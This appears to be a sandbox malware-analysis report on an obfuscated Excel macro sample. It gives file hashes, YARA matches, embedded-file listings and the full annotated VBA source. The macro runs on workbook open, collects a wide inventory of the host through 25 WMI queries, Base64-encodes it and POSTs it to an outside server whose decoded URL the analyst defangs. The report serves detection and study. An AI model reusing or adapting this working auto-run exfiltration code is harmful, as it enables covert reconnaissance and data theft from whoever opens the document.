d878a7c8...3ba3 | Files
VTI SCORE: 93/100
Dynamic Analysis Report
Classification: Downloader

d878a7c8fa46c52020a07de7726a8a740d245dcf0a58355b88a054059f933ba3 (SHA256)

Mert-Obfuscated25.xlsm

Excel Document

Created at 2019-02-17 13:34:00

Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm Sample File Excel Document
Suspicious
»
Mime Type application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File Size 18.00 KB
MD5 915dfb45e8cc74a1b4c6ba4020072bf1
SHA1 0f5d9afab479682afca5f5d39f58d8e624dc988d
SHA256 d878a7c8fa46c52020a07de7726a8a740d245dcf0a58355b88a054059f933ba3
SSDeep 384:Hea2kATkstJrM2Qw1Qth5otZMv5IJPPAva7:+FLwstJrkwaXi/MRPo
Office Information
»
Create Time 2019-02-08 19:16:45+00:00
Modify Time 2019-02-08 19:19:15+00:00
Document Information
»
Application Microsoft Excel
App Version 16.0300
Document Security SecurityFlag.NONE
Heading Pairs Worksheets
Titles Of Parts Sheet1
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: ThisWorkbook
»
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: the three constants below are not referenced by any procedure
' in this module listing. All identifiers in the module are randomised
' lowercase strings, so names carry no meaning.
Const nzslynpeha = 2
Const nefuhtkuev = 1
Const yxtfogysvi = 0
' Auto-run entry point: Excel raises Workbook_Open when the workbook is opened
' with macros enabled. Its only action is to call kobgwwizmj, the routine that
' collects and sends the host inventory.
Sub Workbook_Open()
kobgwwizmj
End Sub
Sub kobgwwizmj()
' Analyst summary: runs 25 WMI queries against the local root/CIMV2 namespace,
' flattens every returned property into text, and hands the text to
' avhvhswfvzznh, which POSTs it to a remote URL.
' Every string literal is hex-encoded and split into two pieces; xmdhezkcfxfn
' turns each piece back into text (two hex digits -> one character). The
' decoded value is shown in the comment above each statement.
' The trailing comments on some sWQL lines ('PC, 'List services ...) are in the
' sample itself and do not always describe the query on the same line.
Dim byfuecbw       As Object
Dim azrwemvrgxpef      As Object
Dim jdryvxbqqka       As Object
Dim vjmxuhqgswzhnlwtbzg        As Object
Dim yichuclkzdspcun               As Long
Dim yhuihbwhuwi               As Integer
Dim pxjjhyujtbsvoolqhqv               As Integer
Dim sWQL(1 To 25) As String
Dim arrMarks() As String
Dim wuvytgeakiv As String
Dim vrxgmbpd As Boolean
' Output buffer: one slot per banner line or property line.
ReDim arrMarks(65535)
' "Select * From Win32_NetworkAdapterConfiguration"
sWQL(1) = xmdhezkcfxfn("53656c656374202a2046") & xmdhezkcfxfn("726f6d2057696e33325f4e6574776f726b41646170746572436f6e66696775726174696f6e")
' "Select * From Win32_SystemEnclosure"
sWQL(2) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f53797374656d") & xmdhezkcfxfn("456e636c6f73757265") 'PC
' "Select * From Win32_LogicalDisk"
sWQL(3) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f4c6f676963616c446973") & xmdhezkcfxfn("6b")
' "Select * From Win32_Processor"
sWQL(4) = xmdhezkcfxfn("5365") & xmdhezkcfxfn("6c656374202a2046726f6d2057696e33325f50726f636573736f72")
' "Select * From Win32_PhysicalMemoryArray"
sWQL(5) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f5068") & xmdhezkcfxfn("79736963616c4d656d6f72794172726179")
' "Select * From Win32_VideoController"
sWQL(6) = xmdhezkcfxfn("53656c6563") & xmdhezkcfxfn("74202a2046726f6d2057696e33325f566964656f436f6e74726f6c6c6572")
' "Select * From Win32_OnBoardDevice"
sWQL(7) = xmdhezkcfxfn("53656c656374") & xmdhezkcfxfn("202a2046726f6d2057696e33325f4f6e426f617264446576696365")
' "Select * From Win32_OperatingSystem"
sWQL(8) = xmdhezkcfxfn("53656c656374202a20") & xmdhezkcfxfn("46726f6d2057696e33325f4f7065726174696e6753797374656d")
' "Select * From WIn32_Printer" (capital I is in the sample)
sWQL(9) = xmdhezkcfxfn("53") & xmdhezkcfxfn("656c656374202a2046726f6d2057496e33325f5072696e746572")
' "Select * From Win32_Product"
sWQL(10) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f5072") & xmdhezkcfxfn("6f64756374")
' "Select * From WIn32_Account" (capital I is in the sample)
sWQL(11) = xmdhezkcfxfn("53656c656374202a2046726f6d205749") & xmdhezkcfxfn("6e33325f4163636f756e74")
' "Select * From Win32_ComputerSystem"
sWQL(12) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f436f6d7075746572") & xmdhezkcfxfn("53797374656d")
' "Select * From Win32_BaseService"
sWQL(13) = xmdhezkcfxfn("53656c656374202a2046726f6d2057696e33325f4261736553") & xmdhezkcfxfn("657276696365") 'List services running (or stopped) on any PC along with the service
' "Select * from Win32_Service"
sWQL(14) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f5365") & xmdhezkcfxfn("7276696365")
' "Select * from Win32_BIOS"
sWQL(15) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f4249") & xmdhezkcfxfn("4f53") 'Represents the attributes of the computer system
' "Select * from Win32_SystemBIOS"
sWQL(16) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f537973") & xmdhezkcfxfn("74656d42494f53")
' "Select * from Win32_Desktop"
sWQL(17) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f44") & xmdhezkcfxfn("65736b746f70") 'Represents the common characteristics of a user
' "Select * from Win32_Environment"
sWQL(18) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e3332") & xmdhezkcfxfn("5f456e7669726f6e6d656e74")
' "Select * from Win32_ComputerSystemProduct"
sWQL(19) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f436f6d") & xmdhezkcfxfn("707574657253797374656d50726f64756374")
' "Select * from Win32_StartupCommand"
sWQL(20) = xmdhezkcfxfn("53") & xmdhezkcfxfn("656c656374202a2066726f6d2057696e33325f53746172747570436f6d6d616e64")
' "Select * from Win32_SystemBootConfiguration"
sWQL(21) = xmdhezkcfxfn("53656c656374202a2066726f6d20") & xmdhezkcfxfn("57696e33325f53797374656d426f6f74436f6e66696775726174696f6e")
' "Select * from Win32_SystemServices"
sWQL(22) = xmdhezkcfxfn("53656c656374202a2066726f6d2057696e33325f537973") & xmdhezkcfxfn("74656d5365727669636573")
' "Select * from Win32_SystemSetting"
sWQL(23) = xmdhezkcfxfn("53656c656374202a2066726f") & xmdhezkcfxfn("6d2057696e33325f53797374656d53657474696e67")
' "Select * from Win32_SystemSystemDriver"
sWQL(24) = xmdhezkcfxfn("53656c656374202a") & xmdhezkcfxfn("2066726f6d2057696e33325f53797374656d53797374656d447269766572")
' "Select * from Win32_LogicalProgramGroup"
sWQL(25) = xmdhezkcfxfn("53656c656374202a2066726f") & xmdhezkcfxfn("6d2057696e33325f4c6f676963616c50726f6772616d47726f7570")
' Run each query in turn and append its results to arrMarks.
For yhuihbwhuwi = LBound(sWQL) To UBound(sWQL)
pxjjhyujtbsvoolqhqv = pxjjhyujtbsvoolqhqv + 1
' Section banner: "***** " & <query text> & " *****" followed by a carriage return.
arrMarks(pxjjhyujtbsvoolqhqv) = xmdhezkcfxfn("2a2a2a2a") & xmdhezkcfxfn("2a20") & sWQL(yhuihbwhuwi) & xmdhezkcfxfn("202a2a") & xmdhezkcfxfn("2a2a2a") & vbCr
' Moniker decodes to "winmgmts:root/CIMV2" (local WMI); the object is re-acquired on every pass.
Set byfuecbw = GetObject(xmdhezkcfxfn("77696e6d676d") & xmdhezkcfxfn("74733a726f6f742f43494d5632"))
Set azrwemvrgxpef = byfuecbw.ExecQuery(sWQL(yhuihbwhuwi))
' Walk every instance returned and every property of each instance.
For Each jdryvxbqqka In azrwemvrgxpef
For Each vjmxuhqgswzhnlwtbzg In jdryvxbqqka.Properties_
' One output slot is reserved per property, whether or not it has a value.
pxjjhyujtbsvoolqhqv = pxjjhyujtbsvoolqhqv + 1
If IsArray(vjmxuhqgswzhnlwtbzg.Value) Then
For yichuclkzdspcun = LBound(vjmxuhqgswzhnlwtbzg.Value) To UBound(vjmxuhqgswzhnlwtbzg.Value)
If Not IsNull(vjmxuhqgswzhnlwtbzg.Value(yichuclkzdspcun)) Then
' Array property: "<Name>(<index>)<value>" + CR ("28" = "(", "29" = ")").
' Each element is written to the same slot, so a later element replaces an earlier one.
arrMarks(pxjjhyujtbsvoolqhqv) = vjmxuhqgswzhnlwtbzg.Name & xmdhezkcfxfn("28") & yichuclkzdspcun & xmdhezkcfxfn("29") & vjmxuhqgswzhnlwtbzg.Value(yichuclkzdspcun) & vbCr
End If
Next
ElseIf Not IsNull(vjmxuhqgswzhnlwtbzg.Value) Then
' Scalar property: "<Name> <value>" + CR ("20" = a single space).
arrMarks(pxjjhyujtbsvoolqhqv) = vjmxuhqgswzhnlwtbzg.Name & xmdhezkcfxfn("20") & vjmxuhqgswzhnlwtbzg.Value & vbCr
End If
Next
Next
Next yhuihbwhuwi
' Trim the buffer to the slots used and join them into one string
' (Join with no delimiter argument separates items with a space).
ReDim Preserve arrMarks(pxjjhyujtbsvoolqhqv)
wuvytgeakiv = Join(arrMarks)
' Exfiltration: the URL decodes to hxxps://www.mertsarica[.]com/macro.php (defanged here).
' The joined inventory is passed as the second argument and sent by avhvhswfvzznh.
vrxgmbpd = avhvhswfvzznh(xmdhezkcfxfn("68747470733a2f2f7777772e6d6572747361726963612e63") & xmdhezkcfxfn("6f6d2f6d6163726f2e706870"), wuvytgeakiv)
End Sub
' Sends the collected text to the given URL as an HTTP form POST.
'   sdjxjlakglxqfehcjcfw  - destination URL
'   pialnzoxqryieavfzgog  - text to send; Base64-encoded by devoitudboz first
' The function never assigns a return value and never reads the HTTP response,
' so nothing in this listing downloads or executes a follow-on payload.
' Network indicator for detection: a POST issued from the Excel process whose
' body is "macro=" followed by Base64 text, Content-Type
' application/x-www-form-urlencoded.
Function avhvhswfvzznh(sdjxjlakglxqfehcjcfw As String, pialnzoxqryieavfzgog As String)
Dim kscseprkyud
' ProgID decodes to "MSXML2.XMLHTTP" (late-bound COM HTTP client).
Set kscseprkyud = CreateObject(xmdhezkcfxfn("4d53584d4c32") & xmdhezkcfxfn("2e584d4c48545450"))
' Method decodes to "POST"; the third argument False makes the request synchronous.
kscseprkyud.Open xmdhezkcfxfn("50") & xmdhezkcfxfn("4f5354"), sdjxjlakglxqfehcjcfw, False
' Header decodes to "Content-Type: application/x-www-form-urlencoded".
kscseprkyud.setRequestHeader xmdhezkcfxfn("436f6e74656e74") & xmdhezkcfxfn("2d54797065"), xmdhezkcfxfn("6170706c69636174696f6e2f782d7777772d666f726d2d75726c656e") & xmdhezkcfxfn("636f646564")
' Body prefix decodes to "macro="; the Base64 text is appended as-is.
kscseprkyud.send xmdhezkcfxfn("6d61") & xmdhezkcfxfn("63726f3d") & devoitudboz(pialnzoxqryieavfzgog)
End Function
' Base64-encodes a string using the MSXML DOM instead of a hand-written encoder.
'   mbnqoyun - text to encode
' Returns the Base64 text of the string's bytes after StrConv(..., vbFromUnicode).
' The MSXML2.DOMDocument60 / IXMLDOMElement declarations are early-bound, so the
' VBA project presumably carries a reference to Microsoft XML v6.0 - confirm
' against the project references of the sample.
Function devoitudboz(mbnqoyun As String) As String
Dim arrData() As Byte
' Convert the VBA (UTF-16) string to a byte array in the system code page.
arrData = StrConv(mbnqoyun, vbFromUnicode)
Dim zvlzrwnd As MSXML2.DOMDocument60
Dim mqwztjzkr As MSXML2.IXMLDOMElement
Set zvlzrwnd = New MSXML2.DOMDocument60
' Element name decodes to "b64"; it is only a scratch node for the conversion.
Set mqwztjzkr = zvlzrwnd.createElement(xmdhezkcfxfn("623634"))
' DataType decodes to "bin.base64": assigning bytes to nodeTypedValue makes
' the element's Text the Base64 form of those bytes.
mqwztjzkr.DataType = xmdhezkcfxfn("62696e2e") & xmdhezkcfxfn("626173653634")
mqwztjzkr.nodeTypedValue = arrData
devoitudboz = mqwztjzkr.Text
Set mqwztjzkr = Nothing
Set zvlzrwnd = Nothing
End Function
' String de-obfuscator used for every literal in this module: decodes a
' hex string into text, two hex digits per output character.
'   colrskqmyttf - hex digits, e.g. "504f5354" decodes to "POST"
' Returns the decoded string. Analysts can recover all hidden strings in the
' sample statically by hex-decoding the arguments passed to this function.
Private Function xmdhezkcfxfn(ByVal colrskqmyttf As String) As String
Dim rupwqucjovcf As Long
' Step through the input one byte (two hex digits) at a time.
For rupwqucjovcf = 1 To Len(colrskqmyttf) Step 2
' "&H" prefix makes Val parse the pair as hexadecimal; Chr$ maps it to a character.
xmdhezkcfxfn = xmdhezkcfxfn & Chr$(Val("&H" & Mid$(colrskqmyttf, rupwqucjovcf, 2)))
Next rupwqucjovcf
End Function

YARA Matches
»
Rule Name Rule Description Classification Severity Actions
VBA_Download_Commands VBA macro may attempt to download external content; possible dropper -
3/5
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
VBA_Obfuscation_ObjectName VBA initializes COM object from long variable name; possible obfuscation -
2/5
de97ca4ae3df3fff588f38d6ba485cac9513307239aa46c806c3f6ce19a29dd8 Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type application/xml
File Size 0.66 KB
MD5 657ada625cec137fc53e444956261bab
SHA1 a33d091b2aa6689be34815b4784811f45c4dd745
SHA256 de97ca4ae3df3fff588f38d6ba485cac9513307239aa46c806c3f6ce19a29dd8
SSDeep 12:TMHdtl46fxhmflbEOEfWKvA1EI+DYQBsOD3O7xVIO/GaBTslXyld:2dti6fxhmflYZf8P+Kw3O7x6O/BTsEld
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-12-21 23:40 (UTC+1)
Last Seen 2019-01-22 13:34 (UTC+1)
ccfd9fdf98e7ecdee89d8d98365cac678000cdf350d49f87ac37debe4f0d732d Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type application/xml
File Size 0.66 KB
MD5 c1a08e4a5909ec8a545236a0d9bce44d
SHA1 63561ba33e3e8615f5883f6da15de948ad65578a
SHA256 ccfd9fdf98e7ecdee89d8d98365cac678000cdf350d49f87ac37debe4f0d732d
SSDeep 12:TMHdtWa6fmEUdzXb6flbEIWOgzXa6flbEetzXV6flbEpSp0HjzXQ4+DYQDE0US1V:2dtWa6ffa7b6flYIO7a6flYq7V6flYm1
File Reputation Information
»
Severity
Whitelisted
First Seen 2013-03-17 16:09 (UTC+1)
Last Seen 2019-01-22 13:34 (UTC+1)
ff19338e683f118d3df8438275ac9a67fccebe7b3992406852156fa0f068d855 Embedded File Text
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type text/plain
File Size 0.02 KB
MD5 dde455ee85d32b4157a3562e8c1c0219
SHA1 de77f3290c856cd00e606061071cabe4032de2a5
SHA256 ff19338e683f118d3df8438275ac9a67fccebe7b3992406852156fa0f068d855
SSDeep 3:kTa4+KOAb0:k+zKOx
c355d1a1ac3a10dfbfbdf579fce19bbdde85927068c2325c8743bdae6e952aad Embedded File XML
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type application/xml
File Size 0.99 KB
MD5 e127b4f14436cd43ac37a90c5bc827fe
SHA1 d443d74fd0951405884761da70c9313c2ad929dc
SHA256 c355d1a1ac3a10dfbfbdf579fce19bbdde85927068c2325c8743bdae6e952aad
SSDeep 24:2dt06fxhmflYZf8qC+B22n19e9wJvcpfNNtC+B2U6Zt:cV5hmNYZt1B7KCJkpfNNt1BIX
59857481089a8fee53aee5d13f381ff666063f534580696c5103dcdd92529247 Embedded File Unknown
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type application/CDFV2-unknown
File Size 25.50 KB
MD5 0f2a860e7199007c769b5bc60b653e64
SHA1 edc25ccba8ae02809da82f3e0d1d7e13b5be095f
SHA256 59857481089a8fee53aee5d13f381ff666063f534580696c5103dcdd92529247
SSDeep 384:NNiKZ8gcNZfsp99p8zfKxUJC3QW9T+5HhAadaX:ANZfspWfKDt+5HhAadaX
5e476c7ad93cb7f49940db8b59d4aced016ec1b168b617db1b54f23303f082da Embedded File Text
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\Mert-Obfuscated25.xlsm
Mime Type text/plain
File Size 0.02 KB
MD5 08c7de6296c09d10dec36654196ed93c
SHA1 c399efc356adad3ab7279ba6e92e9fd7934dec6e
SHA256 5e476c7ad93cb7f49940db8b59d4aced016ec1b168b617db1b54f23303f082da
SSDeep 3:kTa4+KOAbI:k+zKO1